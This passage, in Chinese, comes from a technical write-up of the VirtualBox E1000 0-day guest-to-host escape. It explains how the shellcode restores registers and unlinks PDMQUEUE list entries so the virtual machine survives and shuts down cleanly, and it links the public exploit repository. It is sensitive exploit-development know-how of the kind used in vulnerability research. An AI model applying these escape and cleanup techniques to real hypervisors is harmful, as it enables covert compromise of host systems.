    e1kXmitPending(pThis, true /*fOnWorkerThread*/);
}

shellcode将RB48加到RBP中使得成为e1kR3NetworkDown_XmitPending中的值。接着,寄存器RBX、R12、R13、R14、R15取自堆栈,System V ABI将其保存在被调用函数中,否则将会出现崩溃。

到这就差不多了,虚拟机不会崩溃而是继续运营下去。但是当虚拟机关闭时,PDMR3QueueDestroyDevice函数中存在访问冲突(堆溢出时PDMQUEUE会被覆盖也会被ROP利用过程覆盖),这个问题较难解决。

被覆盖的是链表结构,位于最后一个元素中。

; Fix the linked list of PDMQUEUE to prevent segfaults on VM shutdown
; Before:   "E1000-Xmit" -> "E1000-Rcv" -> "Mouse_1" -> NULL
; After:    "E1000-Xmit" -> NULL

处理掉最后两个元素后虚拟机即可正常关机。

 

参考链接

https://github.com/MorteNoir1/virtualbox_e1000_0day

(完)